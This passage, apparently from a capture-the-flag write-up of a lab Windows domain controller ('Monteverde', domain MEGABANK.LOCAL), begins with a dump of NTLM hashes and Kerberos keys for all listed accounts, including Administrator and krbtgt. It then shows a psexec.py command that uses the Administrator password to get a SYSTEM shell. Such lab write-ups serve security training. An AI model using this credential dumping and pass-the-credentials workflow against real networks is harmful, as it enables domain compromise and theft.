Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff:::
AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06:::
MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6:::
MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1:::
MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea:::
MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3:::
MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6:::
MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736:::
MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8:::
MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388:::
MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:33560f8cab6e95b884e1c4a3acaf70b5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e0d11994e0bc24a2814fb21392b9288d03d3b20a2ff90d2acd7885bf59f7897a
Administrator:aes128-cts-hmac-sha1-96:5974bf7e5a66abc4a97633d2281f4051
Administrator:des-cbc-md5:02808a2f04543d2a
krbtgt:aes256-cts-hmac-sha1-96:0df5aaeb1e5d7bd66ceda568339d77d5f30c80954933add2fd7ed17b5e2daade
krbtgt:aes128-cts-hmac-sha1-96:37e86168ad81735aa30dcec9106ddeed
krbtgt:des-cbc-md5:cb311f4604ab520e
AAD_987d7f2f57d2:aes256-cts-hmac-sha1-96:499e44309bfbd1400445d3f3a5c7214b125428a540fbe50193cdb2f273034d0c
AAD_987d7f2f57d2:aes128-cts-hmac-sha1-96:c05c989bbc1b40295eea3c9578fa5666
AAD_987d7f2f57d2:des-cbc-md5:3b254675bc4ccbcb
MEGABANK.LOCAL\mhope:aes256-cts-hmac-sha1-96:f404b6355cb66799a1ffd72c49106c6cc22e16ff56c0c5e4efe713da1bca9a5e
MEGABANK.LOCAL\mhope:aes128-cts-hmac-sha1-96:3f1c001dc2b3d4b2c827aee045b059d5
MEGABANK.LOCAL\mhope:des-cbc-md5:1aefbcec168abaa8
MEGABANK.LOCAL\SABatchJobs:aes256-cts-hmac-sha1-96:af25309e51c2ff3da410001334d96bd4b0ad4a393eb3f71c7412791cb5a40f11
MEGABANK.LOCAL\SABatchJobs:aes128-cts-hmac-sha1-96:dea0c3b8b225af09bb6e656caf9f40ef
MEGABANK.LOCAL\SABatchJobs:des-cbc-md5:a7f25702452394da
MEGABANK.LOCAL\svc-ata:aes256-cts-hmac-sha1-96:1f4946bcd6d1949fdfab47e273255104c69ae97cb17e3d859568c8a94769dbba
MEGABANK.LOCAL\svc-ata:aes128-cts-hmac-sha1-96:403bc14d95eaabdfc8f006edf6ba85ea
MEGABANK.LOCAL\svc-ata:des-cbc-md5:61fe163dce984962
MEGABANK.LOCAL\svc-bexec:aes256-cts-hmac-sha1-96:ee1b6acdef6f50bac2d086370c47b6e8ee86708b10515e2e58222e72bea7f606
MEGABANK.LOCAL\svc-bexec:aes128-cts-hmac-sha1-96:6e92b69cc69564a94c84674a2b667e30
MEGABANK.LOCAL\svc-bexec:des-cbc-md5:61abe0b53e103d9e
MEGABANK.LOCAL\svc-netapp:aes256-cts-hmac-sha1-96:b61c0ff0547b9bb78721d07dfa33bc2cbb8fb9d191c8084a5a28ebaafb8e12b6
MEGABANK.LOCAL\svc-netapp:aes128-cts-hmac-sha1-96:5bf059b408af0fc79835d99287d9b15a
MEGABANK.LOCAL\svc-netapp:des-cbc-md5:bf51450ee3040d5e
MEGABANK.LOCAL\dgalanos:aes256-cts-hmac-sha1-96:a460009d7fee1055297b25dd6842d496c30e2582d6fde678a07da8fc2059ba35
MEGABANK.LOCAL\dgalanos:aes128-cts-hmac-sha1-96:08ff2b73fabe96bde46450cc2bdd3ce0
MEGABANK.LOCAL\dgalanos:des-cbc-md5:58c2a8b925d62f67
MEGABANK.LOCAL\roleary:aes256-cts-hmac-sha1-96:4e7d182050c52b68358512b56dc178b538b40ffe67b49180c5219524679b84d1
MEGABANK.LOCAL\roleary:aes128-cts-hmac-sha1-96:b6d934d3853e5cd7e1d5107de46f066f
MEGABANK.LOCAL\roleary:des-cbc-md5:468a9bf273c18c07
MEGABANK.LOCAL\smorgan:aes256-cts-hmac-sha1-96:1ea581af68f5087bac84f7e014e1a0e6e2889824ec042908846eff38de05c371
MEGABANK.LOCAL\smorgan:aes128-cts-hmac-sha1-96:a0442fb29e2361899c232de15f946395
MEGABANK.LOCAL\smorgan:des-cbc-md5:156b29d0402a5e4f
MONTEVERDE$:aes256-cts-hmac-sha1-96:8f7063730a427e6068f289310eef7f965ad0786f9483ff2bce34f7bc995ef697
MONTEVERDE$:aes128-cts-hmac-sha1-96:cbc2d3b86e1cb76eeb25a73c8bde3c60
MONTEVERDE$:des-cbc-md5:1c3449205b45cd10
[*] Cleaning up... 
```

We can also use them with `psexec.py` to get shell as system:

```console
opcode@parrot$ psexec.py MEGABANK.LOCAL/Administrator:'d0m@in4dminyeah!'@MONTEVERDE.MEGABANK.LOCAL
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on MONTEVERDE.MEGABANK.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file zIEwSMJJ.exe
[*] Opening SVCManager on MONTEVERDE.MEGABANK.LOCAL.....
[*] Creating service WnUi on MONTEVERDE.MEGABANK.LOCAL.....
[*] Starting service WnUi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
